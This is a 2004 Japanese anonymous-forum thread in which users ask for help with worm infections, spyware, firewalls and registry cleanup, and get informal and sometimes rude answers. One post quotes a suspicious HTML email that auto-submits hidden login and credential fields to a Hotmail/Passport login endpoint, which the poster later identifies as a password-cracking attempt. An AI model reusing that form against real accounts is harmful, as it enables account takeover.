どこにどうするのか全然さっぱり・・。

62 :初心者:04/05/13 19:07
質問です、突然カウントダウンが始まってシャットダウンする場合は
どういう対応をすれば良いですか?XP HOMEです。
教えてエロい人!

63 :名無しさん@お腹いっぱい。:04/05/13 19:15
>>62
諦めてリカバリーする。初心者なんだろ。

64 :名無しさん@お腹いっぱい。:04/05/13 20:21
WORM_NACHI.Bというワームに感染してしまいました。
ウイルス対策ソフトをダウンロード購入し、隔離削除は
したのですが、このワームが作ったらしい「svchost.exe」という
ファイルが、WINDOWSのSYSTEM32のフォルダから消すことが出来ません
(「ディスクがいっぱいになっていないか、書き込み禁止になってないか
またはファイルが使用中でないか確認して下さい」と出ます)
ウイルスチェックをしても、もう感染はしてないようなのですが、
このファイルはそのままにしておいても大丈夫なのでしょうか?
どなたか詳しい方、教えて頂けると助かります。

65 :名無しさん@お腹いっぱい。:04/05/13 20:22
>>60
どんな音がするのかわからんからなんともいいようがないが
ビーとかビポッとかいう感じの音が今まで鳴ってなかったのに
なるようになったのなら、何かのエラーが発生している可能性
がある。Nortonはそんな音鳴らさんし、セキュリティとはおそらく
関係がないので移動したほうがいいよ。

>>61
スタート→すべてのプログラム(プログラム)→Windows Update

>>62
1.セーフモードで起動
2.ローカルエリア接続のプロパティからXPのファイヤーウォールをONにする。
3.レジストリのHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 からあやしい値を削除。ふだんから注意してないとわからんがな。avserveなんてのがあったら
 そいつだ。
4.スタート→検索でHostsを検索し 127.0.0.1 localhost以外のものを削除して上書き
5.通常起動してオンラインスキャン。見つかったものを削除
6.ウィルスワクチンベンダーのサイトで対策ページを参照。およびWindows Update
7.体験版でもなんでもいいからウィルス対策ソフトをインストール(速やかに製品版を買いにいくこと)
8.ここまでよんでわかんなかったらリカバリー。そのほうが早い。

検出名がわからんようじゃリカバリーしろって言われてもしょうがないぞ。

66 :名無しさん@お腹いっぱい。:04/05/13 20:32
>>64
今頃NACHIかよ。おめでてーな。
タスクマネージャからSVCHOSTを全部殺すか、
セーフモードか、
回復コンソールか、
で消せるかと存じます。お試しあれ。

67 :名無しさん@お腹いっぱい。:04/05/13 20:33
>>64
そいつは本物のsvchot.exe。消してはいけない。
検出名からするとウィルスバスターを入れたのかな?
心配ならシマンテック等別会社のオンラインスキャン
を実行して、なにもでなかったらとりあえず安心していい。

68 :名無しさん@お腹いっぱい。:04/05/13 20:36
>67
素早い回答、ありがとうございました。
お答えの通り、ウイルスバスターを入れてスキャンし、
さらにシマンテックのオンラインスキャンも行って
ウイルスがないことを確認しました。このファイルは
元々あったものなんですね。やっと安心出来ました。

69 :名無しさん@お腹いっぱい。:04/05/13 20:44
>66
パソコン買い替えたばかりで、対策ソフトを入れないまま
すぐにネットに繋いだのがいけなかったみたいです。
友人にもバカにされました、今頃NACHI感染かって。

70 :名無しさん@お腹いっぱい。:04/05/13 20:58
>>66
おめでてーのはおめーだバカたれ。

71 :名無しさん@お腹いっぱい。:04/05/13 21:03
>>70
ヘン、釣られてやがんの(w

72 :名無しさん@お腹いっぱい。:04/05/13 21:29
>>44
ありがとうございました。
結局ファイルを退避させて、OSを入れなおしました。
今のところは普通につかえています。

73 :名無しさん@お腹いっぱい。:04/05/13 22:50
Yahooチャット越しにウィルスを仕込まれたようです。
アラビア語っぽいサイトが勝手に立ち上がるのですが、
現在流行っているのでしょうか?

OS:xpHome


74 :名無しさん@お腹いっぱい。:04/05/13 23:27
ウイルスバスターのFW使ってるんだけど・・ショボイらしいね・・
windows xpのFW入れるのとどっちがいい?
素直にFWソフト導入したほうがいいのかな?

75 :名無しさん@お腹いっぱい。:04/05/13 23:31
>>74
俺はウイルスバスターのFWでいいやと思ってる。ルータ併用だし。

76 :45:04/05/13 23:45
obj[0]=ファイル : c:\documents and settings\****\cookies\****@000[1].txt
obj[1]=ファイル : c:\documents and settings\****\cookies\****@003[1].txt
obj[2]=ファイル : c:\documents and settings\****\cookies\****@cgi-bin[2].txt
obj[3]=ファイル : c:\documents and settings\****\cookies\****@doubleclick[1].txt
obj[4]=ファイル : c:\documents and settings\****\cookies\****@excite.co[2].txt

これがAd-Awareで出てくるログです
****の部分は4文字(漢字)の知らない人の名前

その名前でググッてみましたがヒットしなかったです。

77 :名無しさん@お腹いっぱい。:04/05/14 00:04
>>76
まってたよ。
それCookieだよ。それ自体はほとんど無害。Web上での行動追跡に
使えたりするからスパイウェアとして検出される。拾ったところで
たいしたことないけど、嫌だったらIEのプロパティからプライバシー
タブひらいて拾わないように設定できる。通常の設定だと普通に
web閲覧してるだけでガンガン拾う。
それより気になるのが知らない人のアカウントだよね。
とりあえずコンパネから入ってユーザーアカウントを
削除してしまったほうがいい。知らない人のアカウントが突如
でてきたとしたら何が起こってるかわからないから、おいらだったら
クリーンインストールするけどね。だれかほかにそのPCさわってる
人いないの?
明日の朝また来て見ますよ。

78 :45:04/05/14 01:25
>>77
ありがとうございます。
そのユーザーアカウントが存在しないんですよ
フリーソフトが問題なのかなとも思ったりするけど
クッキーは問題無いと言う事なのでしばらく様子見てみます

最後はセキュリティーの専門の人呼んで解決します。

79 :名無しさん@お腹いっぱい。:04/05/14 01:27
宝物幻想の管理人が中学生だと知って、とても自分が惨めに思えてきました。
漏れは今までなにしてたんだろ・・・と

80 :名無しさん@お腹いっぱい。:04/05/14 01:37
サッサーに感染しました・・・
で、サッサースレでみて駆除しようと格闘してるんですが、
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
の レジストリ エディタが起動しますので左側の [+] マークを順にクリックし、以下のレジストリキーを選択します。

? キー: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

これは一つずつしらみつぶしで探すしかないんでしょうか?
気が遠くなってきました・・・


81 :名無しさん@お腹いっぱい。:04/05/14 01:44
>>80
あほか?なんのために、\マークで区切られてると思ってるんだ。
エクスプローラー使った事ないのか?

82 :名無しさん@お腹いっぱい。:04/05/14 03:10
>>76
なんか波打ってるように見える

83 :名無しさん@お腹いっぱい。:04/05/14 03:51
>>80
> これは一つずつしらみつぶしで探すしかないんでしょうか?
イタダキ。座布団一枚 (・∀・)つ◆ どーじょ。

84 :名無しさん@お腹いっぱい。:04/05/14 03:52
>>82
ホントだ。スクロールさせると波打つね。

85 :名無しさん@お腹いっぱい。:04/05/14 08:13
ウイルス質問スレでスルーされたので、こちらで質問させて頂きます。
NAVでC:\WINNT\system32\NetServices.exeにW32.HLLW.Lovgate.G@mmが検出され、
自動的に削除されるのですが、しばらくするとまた同じものが検出され、何度もその繰り返しが
続いています。シマンテックのサイトにある方法は何度も確認してやっていますが、効果が
ありません。また、トレンドマイクロやPandaの無料ツールなども試しましたが同様です。
かれこれ一ヶ月近くもこの状態で何か気持ちが悪いのでどうかよろしくお願いします。

86 :名無しさん@お腹いっぱい。:04/05/14 08:18
>85
リカバリ

87 :名無しさん@お腹いっぱい。:04/05/14 08:24
>>85
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_LOVGATE.Fの
方法は試したか?HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\に
登録されたキーが残っているから復活すると思われ。
シマンテックとトレンドの方法をミックスして試してみれ。

88 :名無しさん@お腹いっぱい。:04/05/14 09:16
>>78
パスがあるんだから少なくともフォルダは存在してるはず。
ユーザーアカウントが作られてて、その個人用フォルダとして
存在してるのか、単なるフォルダとして存在してるのかは不明
だけどね。Cookieが保存されていくってことはアカウントが存在してる
んじゃないかと予想してます。
ユーザーのアカウントはどこで確認してるかな?そのアカウントの個人用フォルダ
に隠し属性が付いている場合Documents and Settings\を覗いても見えない場合がある。
マイコンピュータ→ツール(T)でフォルダオプション開いて
「ファイルおよびフォルダ」の項目の「すべてのファイルとフォルダを表示する」
を選択しても見えないかな?XP proかXP Homeなら
コントロールパネルの管理ツールから「コンピュータの管理」を開いて
「システムツール」→「ローカルユーザとグループ」とツリーを展開。
その中の「ユーザー」の項目の中にへんなアカウントない?
あったら即削除。アカウントが存在しない場合は単なるフォルダかもしれない。
>フリーソフトが問題なのかなとも思ったりするけど
なにかのアプリが原因ならアカウント削除したりフォルダ移動した時点で不具合
でるからわかるんじゃない?

>>82
ほんとだ、うねってる。

89 :名無しさん@お腹いっぱい。:04/05/14 10:50
>>87
ありがとうございます。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
キー:"Microsoft NetWork FireWall Services"
を発見し、削除しました。これで大丈夫と思いますが、しばらく様子見てみます。

90 :78:04/05/14 10:58
>>88
今夜やってみます
また結果は報告します
ありがとうございます。

91 :名無しさん@お腹いっぱい。:04/05/14 11:21
質問です。
今朝9時ごろ海外のエロいページをみてたらウイルスバスターの
リアルタイム検索でJS_NOCLOSE.Eというのに二つ感染したようで
一つは感染ファイルを隔離できたのですぐ消しましたが
もう一つは隔離できませんでした。
ウイルス検索を今までしてましたがみつかりませんでした。
ほっといても平気でしょうか?(
もしくはどうやって駆除するのでしょうか?
ちなみに検出ファイル名は下のほうがテンパラリーインターネットファイル
となっているので一時ファイルのとこのようです。よろしくお願いします。


92 :名無しさん@お腹いっぱい。:04/05/14 12:26
テンパラリあげ

93 :名無しさん@お腹いっぱい。:04/05/14 13:18
キャット空中3回転か?

94 :名無しさん@お腹いっぱい。:04/05/14 13:24
送受信が非常に重たくなったり繋がらなくなって困っています
モデムがひっきりなしに点滅して、ウイルスバスターで監視してみると1,000,000バイト以上
のデータが送信され続けています
ウイルスやスパイウェア検出ソフトを一通りためして2度クリーンインストールしましたが
だめですCドライブ以外もクリーンインストールしようかとオモテますが
やはりスパイウェアなのでしょか


95 :名無しさん@お腹いっぱい。:04/05/14 13:26
http://up.negi-ma.net/img/140.jpg


96 :名無しさん@お腹いっぱい。:04/05/14 13:26
なんでみつからないのにスパイウェアなの?

97 :91:04/05/14 13:32
どなたかお願いします。

98 :名無しさん@お腹いっぱい。:04/05/14 13:39
>>96
データ送信し続けてる点でそうかなと思いマスタ
見つけられないというか、クリーンインストールして
ネットにつないだとたんに、この状態になってしまいます
古い98ノートだと大丈夫なのにXPはダメなんです


99 :94=98:04/05/14 13:55
どうやらwuamgrd.exeという香具師みたいですた
バスターでもAD-awareでも引っかかりません出した
ウインドウズのアップデートの際に入れてしまったみたいです
検索すると\Windows\Prefechにありました、regeのRUNとstart.iniにもありました

クリーンインストールしてネットにつないでアップデートしようとすると
ソフトのインストール確認が出るのですが、マイクロソフト関連のものかと思い
OKしてしまったみたいです


100 :名無しさん@お腹いっぱい。:04/05/14 13:56
>>91
トレンドマイクロのウイルスデータべ−スで調べれ

101 :名無しさん@お腹いっぱい。:04/05/14 14:01
>>99
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SDBOT.JG

ルータ付けないでインターネットに繋いでるだろ。生はあぶないぞ。
ウンドウズのアップダテ何故しない。

102 :名無しさん@お腹いっぱい。:04/05/14 14:35
クリーンインスコも結構だけど、SPやFIXがない状態に戻っちゃうんだから、
FWなりルータなりで防ぎつつwinupdateしないとマズいでしょ。

103 :名無しさん@お腹いっぱい。:04/05/14 14:53
くだらないこと聞くかもなのですけど、書き込みとかしたら、そこのホームページを運営している人には、
自分の情報がはっきりわかってしまうものなのでしょうか?
で、名乗らなくても、ID(?)とかホスト名(?)とかから個人が特定されることが
あるのでしょうか?

104 :名無しさん@お腹いっぱい。:04/05/14 15:20
>>103
あるよ。君は2chで爆破とか殺人を予告する書き込みをして
逮捕された人間がいることを知らないの?

105 :名無しさん@お腹いっぱい。:04/05/14 15:22
FWの履歴確認するとWindows Explorerが
239.255.255.250:1900に勝手に接続したがって うざいんですが。
これは許可してもいいのでしょうか?


106 :105:04/05/14 15:35
自己解決しました。

107 :名無しさん@お腹いっぱい。:04/05/14 15:51
先日Win2kおかしくなって
今日再インスト
サービスパックやらなんやらupdate
ノートンいれたらわけわからんexeが外部にアクセスしようとしてる
とりあえず遮断してスキャンウィイルス反応wormに感染してたorz
気持ち悪いのでこれから再びフォーマットから再インストするよ
疲れた・・・
アンチソフトやファイアウォールやルータ入れてない
素のwindows使ってる人のPCってどうなってるのと考えると合掌

108 :名無しさん@お腹いっぱい。:04/05/14 16:00
>>105
次のページを見て判断すれ
ttp://homepage3.nifty.com/tef-room/trouble/upnp1.html
ルータの設定例を色々みても224.0.0.0/4(239.255.255.250も含まれる)宛てのパケットは破棄する例が多い。

109 :105:04/05/14 16:06
>>108
ありがとう、参考になりました。

110 :名無しさん@お腹いっぱい。:04/05/14 16:56
>>109
マルチは死んでね。

111 :名無しさん@お腹いっぱい。:04/05/14 23:32
オンラインスキャンにひっかからないウイルスっていますか?どうやらパケットだすみたいなんですが・・・

112 :あぼーん:あぼーん
あぼーん

113 :名無しさん@お腹いっぱい。:04/05/14 23:38
ルーターの過去ログなんですが、
DHCP:offer(XXX.XXX.XXX.XXX)
このXXX.XXX.XXX.XXXがたしかプロクシの
アドレスだったような気がするんですが、プロクシを通さないでも
このアドレスが提示されてくるんですが、これってどういことなんでしょうか。
ここは普通プロバイダのDHCPサーバーになるんじゃないですか?
自分なりに調べてみたんですが、分からないので教えてください。

114 :名無しさん@お腹いっぱい。:04/05/14 23:38
>>112
通報しました!

警視庁通報フォーム
http://www.keishicho.metro.tokyo.jp/anket/other.htm
証拠画像
http://www.keishicho.metro.tokyo.jp/anket/thanks2.htm

115 :名無しさん@お腹いっぱい。:04/05/14 23:39
>>113
すいません。半角でXXX.XXX.XXX.XXX

116 :名無しさん@お腹いっぱい。:04/05/14 23:39
自分で自分に、メアドさらして「ウイルス送って」って投稿したら
犯罪なの?

117 :名無しさん@お腹いっぱい。:04/05/14 23:43
このスレ↓を見ておききしたいんだけど
http://tv5.2ch.net/test/read.cgi/morningcoffee/1084456084/l50

ハッキングされているかどうか知るには↓の方法でいいの?
http://tv5.2ch.net/test/read.cgi/morningcoffee/1084456084/97


118 :名無しさん@お腹いっぱい。:04/05/14 23:44
>>116
氏ね、マルチ。

119 :名無しさん@お腹いっぱい。:04/05/14 23:45
>>116
そうでない可能性が高いと判断して通報したんだろ。

120 :112=116:04/05/14 23:59
>>119
意味わかんないっす。
どういう意味っすか?
それにしても複数のスレに投稿したのに全然こないなぁ・・・
えろ板の方がよかったか・・・
2ちゃんねるってたいしたことないっすね^^;

121 :名無しさん@お腹いっぱい。:04/05/15 00:01
>>116
どうせ嫌いな香具師に送りつけるためだろうけど
もし、その人が政府関係に友達がいて・・・∞

とにかくウイルス拡散するのは間違いないわけで・・・
明らかに意図的で悪質かつ卑劣な手段をとってる

通報はマジ

122 :名無しさん@お腹いっぱい。:04/05/15 00:03
>>117
だめ

123 : :04/05/15 00:06
>>120
 あなたのやりかたが下手なだけ。
 メールがわんさとくるやり方がある、けど教えない。

124 :112=116:04/05/15 00:07
>>121
だから『自分で自分に』っていってるやろが!!!!!!!!!
個人でウイルス楽しむっちゅうんじゃい!!!
ばらまかへん!!!!!!!!!!!!!!!!!!!!!!



125 :名無しさん@お腹いっぱい。:04/05/15 00:17
>>122
回答どうも。でもその一言だけでは・・

ファイアーウォールにはログが沢山残っているし保存もしているんだけど
それってブロックしたもののログでしょ

実際ハッキングされているとしたらその痕跡というのはどこを調べれば
わかるんでしょう?

126 :名無しさん@お腹いっぱい。:04/05/15 00:26
>>124
だから、そのアドレスがお前のものだと証明しろよ。
お前頭悪そうだから証明の方法判らないだろ。特別に教えてやる。
verisignから証明書買って署名つきで依頼しろ。

127 :名無しさん@お腹いっぱい。:04/05/15 00:28
>>125
ログ

128 :名無しさん@お腹いっぱい。:04/05/15 00:32
OutlookExpressで送信したりするとデスクトップに
「 ~ 」って名前の不明のファイルが自動的に出来るんですが
WordPad等で開いてみると
自分のメールアドレスなどが暗号化されて書いてあるのですが
これは一体なんなのでしょうか?
情報が漏れているのか心配です。

129 :124:04/05/15 00:32
>>126
なんかややこしいなあ
みんなたくさんウイルス来ててんのに、
おれには全然来ない。
ウイルス一つ手に入れるのもややこしすぎてできない
どんなんか見てみたいだけやのに
みんなレベル高杉!
通報いややからもうやめとく
俺は泣く
今から布団に入って
泣く


130 :名無しさん@お腹いっぱい。:04/05/15 00:36
>>129
どうせイジメられた香具師か、降られた彼女にでも送りつけるつもりだろう ( ̄ー ̄)ニヤリッ

そうはさせん


131 :名無しさん@お腹いっぱい。:04/05/15 00:38
>>128
WinFAQに載ってたなソレ。
セキュ的に無問題だった筈だけど、自分で調べてみてちょ。

132 :名無しさん@お腹いっぱい。:04/05/15 00:38
>>130
漏れのATOKアフォだなw フラれた彼女とかに・・って・・(ry

133 :名無しさん@お腹いっぱい。:04/05/15 00:40
>>128
暗号化ってどうやって解読できたの?

134 :124:04/05/15 00:41
>>132
「降られた彼女」か・・・、フフ、レベル高いな。
おれはもうすぐ25やが、彼女なんかいたことないぞ。
まいにちさびしく072やってる。まあ金かからんでいいけどな

135 :124:04/05/15 00:45
「あぼーん」って・・・
もうか・・・
なんか仕事はやいっすね^^;

136 :名無しさん@お腹いっぱい。:04/05/15 00:46
>>128
ほれ
ttp://support.microsoft.com/default.aspx?scid=kb;ja;825380&Product=oex


137 :128:04/05/15 00:47
>>131
ありがとうございます。早速見てきて解決できました。
>>133
記号混ぜて3、4文字飛びぐらいにバラけてるだけだったんで

138 :128:04/05/15 00:48
>>136
ありがとうございましたm(_ _)m

139 :名無しさん@お腹いっぱい。:04/05/15 00:48
JS.Downloader.Trojanってのに感染したっぽいんですが、どうすりゃいいんでしょう??


140 :名無しさん@お腹いっぱい。:04/05/15 00:53
>>139
まず検出名でぐぐろうや。すぐに駆除方法みつかったよ。
英語だったけどな。

141 :名無しさん@お腹いっぱい。:04/05/15 00:55
>>124
しかもマルチポストだしな
確信犯以外の何者ではない罠w

142 :名無しさん@お腹いっぱい。:04/05/15 01:28
すみませんが質問させてください。
怪しいHTMLメールが来たのですが、このメールは何をするような仕組みなんでしょう?
よろしくお願いします。
以下ソース。(アカウントの部分だけ****に変えてあります)
<html>
<head>
<noscript>
<meta http-equiv=Refresh content="0; url=http://www.hotmail.com">
</noscript>
</head>

<body onload="document.pform.submit(); ">
<form name="pform" action="https://loginnet.passport.com/ppsecure/md5auth.srf?lc=1041" method="POST">
<input type="hidden" name="mode" value="ttl">
<input type="hidden" name="login" value="****@hotmail.com">
<input type="hidden" name="username" value="****@hotmail.com">
<input type="hidden" name="sid" value="507">
<input type="hidden" name="kv" value="5">
<input type="hidden" name="id" value="2">
<input type="hidden" name="sl" value="1048">
<input type="hidden" name="rru" value="/cgi-bin/HoTMaiL">
<input type="hidden" name="auth" value="5komRGRt6Dz*GemzwwuiaTzT6sFTWBnp8gbFtDzqtUug*iDyOBhjeRC*ita*fu9XX1YlbD6CL!BY6jq8c45IOlqQ$$">
<input type="hidden" name="creds" value="886bf101673469448b53fd6d49b148d5">
<input type="hidden" name="svc" value="mail">
<input type="hidden" name="js" value="yes">
</form></body>
</html>

143 :名無しさん@お腹いっぱい。:04/05/15 01:53
さっきからPCを起動させると、アイコンは出てるんですが、
クリックしても何も反応しない。
なのでシャットダウンするとエクスプローラ.exeを終了してます。とメッセージが出ました。
これを6回くらい続けてやっと今普通に起動できるようになったんですが、
何が原因ですかね?OSは2000で、
マカフィーのセキュリティスイートは入れてるんですが、
ウイルススキャンでは何も検出されませんでした。

144 :45:04/05/15 02:09
>>88
名前フル ネーム説明
Administratorコンピュータ/ドメインの管理用 (ビルトイン アカウント)
Guestコンピュータ/ドメインへのゲスト アクセス用 (ビルトイン アカウント)
HelpAssistantRemote Desktop Help Assistant Accountリモート アシスタンスを提供するためのアカウント
SUPPORT_388945a0CN=Microsoft Corporation,L=Redmond,S=Washington,C=USヘルプとサポート サービスのベンダ アカウント
****

****は俺の名前でした
そして隠しファイル表示させるもその名前のフォルダーは発見出来ず
検索機能使ってみるもヒットせず
クッキー&インターネット一時ファイルはすべて削除しました。


145 :名無しさん@お腹いっぱい。:04/05/15 02:24
質問です。
IEを起動するとアドレスが"auto:blank"になって英語の検索ページに
なってしまいます。ツールのインターネットオプションでホームを指定しても
auto:blankになってしまいます。
 ちなみに、この症状になったのは変なサイトに行ってしまった時からです。
Nortonでは正常で、Spypodでのクリーニングも完了してます。
どなたかご助言を・・

146 :名無しさん@お腹いっぱい。:04/05/15 02:32
>>145
【正式】ウィルス情報&質問 総合スレッド☆Part18
http://pc3.2ch.net/test/read.cgi/sec/1081735712/10

この辺を試してみ


147 :142:04/05/15 02:35
自己解決しました。
どうやらパスクラックのようでした。お騒がせしました。
ttp://hotwired.goo.ne.jp/news/news/technology/story/2942.html

148 :名無しさん@お腹いっぱい。:04/05/15 02:54
>>145
about:blankだろ。spybotだろ。

Spybotはバージョンアップして1.3が出てるから試してみろ。
エロサイト見たら…助けてください!Part23
http://pc5.2ch.net/test/read.cgi/pcqa/1083768109/643-644

149 :88:04/05/15 07:54
>>144
ごめん。そうなると俺にはもうわからん。
力になれなくてすまんね。

150 :名無しさん@お腹いっぱい。:04/05/15 08:20
>>144
port 1900からのUDPの宛先は233.255.255.250か?
>>108に書いてあるwebの説明読んでUPnPサービス止めたら?

151 :150:04/05/15 08:32
>>150
スマソ
s/宛先は233.255.255.250/宛先は239.255.255.250/

152 :名無しさん@お腹いっぱい。:04/05/15 09:37
>>89
う、また検出された。
レジストリ消したはずなのになぜか復活してた。
もうだめぽ。

153 :名無しさん@お腹いっぱい。:04/05/15 11:27
WindowsUpdateのKB840374ってXPのみですか?
自宅にXP機と2k機があるのですが、2k機の方に入らない、入れられないので不安です。

154 :名無しさん@お腹いっぱい。:04/05/15 11:36
不正アクセスをされると具体的にどんなことをされるのですか?
ウィルスやスパイウェアを入れられるのでしょうか

155 :名無しさん@お腹いっぱい。:04/05/15 11:52
昨夜は筋肉隆々とした裸の若者がチンコ勃起させた状態で柔軟体操する夢を見た。

156 :名無しさん@お腹いっぱい。:04/05/15 12:02
質問です。

先週末のことですが、画面にぽつぽつと赤い血痕みたいなのが出てきて、女の悲鳴が聞こえて、
画面が全て真っ赤に染まるとそこに「ぬるぽ」という文字が浮かび上がってきました。

それからディスクのファイルをよくよく調べてみたら、txt、jpg、mp3ファイルの中身が以下の
ような240,079バイトのテキストファイルに書き換えられてしまいました。

  ∧_∧
 ( ´∀`)< ぬるぽ

(長い空白行)


  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ    人
    / )    <  >__Λ∩
  _/し' //. V`Д´)/ ← (使用者名)
 (_フ彡        /

ファイルが壊されたときの環境は、Windows2000SP4で、Windows Updateは全て適用済み、ウィ
ルスチェックソフトはいれてませんでした。接続形態はBフレッツで、プロバイダはDTI、ルー
ター越しにつないでいました。

その後別のドライブにwindows2000をインストールしたあと、ファイルが壊されたドライブをつ
ないで買ってきたノートンのウィルスチェックと、ウィルスバスターオンラインスキャンをか
けてみても、AntinnyとAntinnyG以外のウィルスは検出されません。

なにが原因でドライブが壊されたのか、わかるかたいますでしょうか?

157 :名無しさん@お腹いっぱい。:04/05/15 12:05
ハイグレードなプリント用紙にホモ画像を勝手に印刷されたと言ってた奴がいたな。

158 :名無しさん@お腹いっぱい。:04/05/15 12:10
>>156
ネタ放置

159 :名無しさん@お腹いっぱい。:04/05/15 12:43
>>156
ご愁傷さま。とりあえずここでも見れ。
http://pc5.2ch.net/test/read.cgi/sec/1081131323/l50

160 :159:04/05/15 12:54
>>156
最後までよく読んでなかった。
「AntinnyとAntinnyG以外のウィルスは検出されません」って
あと何を期待してるのよ?

161 :名無しさん@お腹いっぱい。:04/05/15 12:57
はじめまして、お邪魔します。
WinXPでYahooメッセンジャー(Yahoo.co.jp)のver5.1.0 1095bと同じくYahooメッセンジャー
(こちらはYahoo.com)のBETA を使っています。
が昨日からファイル送受信が出来なくなってしまいました。
ノートンインターネットセキュリティ2004とノートンアンチウィルスをインストール
していますが、先日あるサイトでXPのファイアウォールも有効にしなければ危険!と
書いてあったのでそちらを有効にしてしまってからかなあと思い、無効にしたんですが
相変わらずファイルの送受信はできません。
どうすれば送受信が
今までずっとマカーだったのでWinのセキュリティ対策に関してはほぼ初心者な
婦女子でふつつかな質問かもしれませんが、よろしくお願いします。

162 :161:04/05/15 12:59
あれ・・途中で切れてしまっている文章が。すみません。
下から3段目ですが「どうすれば送受信ができるようになるでしょうか?」
です。失礼しました。

163 :156:04/05/15 13:09
Antinnyってさらしとかするだけかと思ってました、解決しました、ありがとうございます。

164 :名無しさん@お腹いっぱい。:04/05/15 13:53
ご助力お願い致します。

WinXP、IE6、回線は光でプロバはニフです。
ルーター(バファロー)使用で、マカフィーのファイヤーウォールを導入しています。
一昨日、ファイヤーウォールのアップデートをしてから自分のサイトのなかで
URLにcgiが含まれるものだけ、閲覧できなくなりました。
自サイトはナウでヤングなサーバのところです。
その後、自サイトそのものが閲覧できなくなり、cgi及びcgi-binが含まれるURL
すべてと、httpsで始まるURLのすべて(自サイトでなくても)が閲覧できなくなっています。


なにがなにやら解からなくて説明も不充分かと思いますが、なにも設定等
いじって変えていないので、どうしたらいいのか解かりません。
どうぞアドバイスよろしくお願い致します。


165 :名無しさん@お腹いっぱい。:04/05/15 15:29
>>161
ファイヤーウォールは複数同時に起動すると
トラブルがおきやすい。どっちかひとつにしておくこと
XPならとりあえずシステムの復元を試す。

>>164
マカフィーをいったんアンインストールすれば正常な状態にもどるか?
再インストールしてアップデートすると問題が再現されるか?
以上を確認してからこちらへ

ttp://pc5.2ch.net/test/read.cgi/sec/1083116281/

166 :名無しさん@お腹いっぱい。:04/05/15 15:47
hotmailにログインもなにもしていないのに
FWのアクセスログにhotmailからのESTAB(リモートポートは443)があったんですけど
これなんだろう・・・

167 :名無しさん@お腹いっぱい。:04/05/15 16:00
MSNexplorerにサインインしようとすると、
「サインインを完了できません。 サービスが一時的に使用できなくなっているか、インターネットの接続に問題があります」
というメッセージが表示されてサインイン出来ません。
ネットパスポートでサインインしようと試みるも、そっちもページが表示出来なくて登録出来ませんでした。

このエラーメッセージでぐぐっても、誰一人として解決してませんでした。
ぼくはどうしたらいいんでしょうか?

168 :名無しさん@お腹いっぱい。:04/05/15 16:23
>>164
どうしてわざわざそんな糞ファイアーウォールソフトを
購入または利用しようとしたんだ?
その時点で間違えている。

169 :名無しさん@お腹いっぱい。:04/05/15 17:29
164です。
>165、ありがとうございました。夜にでもアンインストール→再インストールして、
誘導してくださった板のほうへ伺います。

170 :名無しさん@お腹いっぱい。:04/05/15 18:58
カード決済会社の信頼性はどこで判断できますか?
クレジット決済代行業者の信頼性はどこで判断したらよいですか?
カード情報を収拾されるのが怖いです?
このスレの話はどう思いますか?
ttp://news10.2ch.net/test/read.cgi/news2/1084586733/l50



171 :名無しさん@お腹いっぱい。:04/05/15 18:59
全部クエスチョンが付いている。。。

172 :名無しさん@お腹いっぱい。:04/05/15 20:26
>165
161さんとは別人ですが、質問させて下さい。
ファイアーウォールを複数同時起動というと、
・コントロールパネル→接続の詳細→プロパディ→ファイアーウォールを
有効にする
・ウィルス対策ソフトのファイアーウォールを有効にする。
これらのチェックボックスを両方オンにしていることも
指すのでしょうか?

173 :名無しさん@お腹いっぱい。:04/05/15 20:32
>>172
XPの付属FWと他のFWを同時起動するのも
もちろんトラブルの元

174 :172:04/05/15 21:27
>173
ありがとうございます。取り敢えずXPの付属FWのチェックボックスを
オフにしておきました。

175 :名無しさん@お腹いっぱい。:04/05/15 21:40
何かした覚えがないのにnavmgrd.exeてのが入ってますた
何度かワームウイルスがはいってたのでうちのPCは
もう情報が筒抜けになってるのでしょか

176 :名無しさん@お腹いっぱい。:04/05/15 21:41
ちなみに何度クリーンインストールしてウイルスバスターとか入れても
いつの間にかワームが入って来てしまいます

177 :名無しさん@お腹いっぱい。:04/05/15 21:45
YahooBBの奴からガンガンNetsky.Dが送られてくるんですけど
Yahooに窓口は無いのでしょうか?探してもそれらしきものを
発見できませんでした

178 :e21kllbb@ipcon.ocn.ne.jp ihan65:04/05/15 21:58
情報が筒抜けになったらどうなるんだろう


179 :名無しさん@お腹いっぱい。:04/05/15 22:32
>>175
インターネットに直接繋いでる?ルーターとか挟まないで。
まあファイルとプリンター共有を無効にしとけばそいつには感染しないよ。
つかルーターかファイアーウォール入れた方が吉。

>>177
自分のプロバイダーに通報したら?

>>170
最近のカードは不正使用された場合の保険が付いてるからな、それ程心
配いらないんじゃない?しかしそーゆー奴に限ってカード使った時の控
えとか明細捨てちゃうんだよねぇ〜、そのままw

180 :175=176:04/05/15 22:38
そうなんですよね
ルータ単体で買おうか、ルータモデムタイプのプロバイダに変えようかと
オモテたら、こんなことになってしまいますた トホホ


181 :名無しさん@お腹いっぱい。:04/05/15 22:52
>>179
>>170は、カードの不正利用だけでなく、個人情報をかすみ取られるから怖い。
利用サイト、本名、メアド、電話番号、カード番号、IP等など。



182 :名無しさん@お腹いっぱい。:04/05/15 23:00
>>180
いい勉強したじゃないの。
とりあえず無料のファイアーウォールつかっときなよ。
何種類かあるけどOutPostでいいんじゃない?

ttp://www.agnitum.com/

英語苦手だったら
ttp://atubon.hp.infoseek.co.jp/fire.html
このあたりで

183 :名無しさん@お腹いっぱい。:04/05/15 23:01
>>181
本名、電話番号←同級生が卒業アルバム売ってすでの漏れてる。
メアド←ワームに感染した奴がばら撒いてる。
利用サイト、IP等←後ろ指差される様な使用してなきゃ問題なし。
カード番号←不正使用保険、不正使用監視システムで監視。

まあ心配ならいつもにこにこ現金払いすれば?w

184 :名無しさん@お腹いっぱい。:04/05/15 23:01
あれ?バスターつかってるのに感染?

185 :名無しさん@お腹いっぱい。:04/05/15 23:03
MeのIE6.0、YBB8Mなんですが、昨日辺りからIEを起動させると
途中から異常にIEが重くなり急に全てのアプリケーションがネットに
接続できなくなるようになりました。

再起動させると直るんですがまたIE起動すると
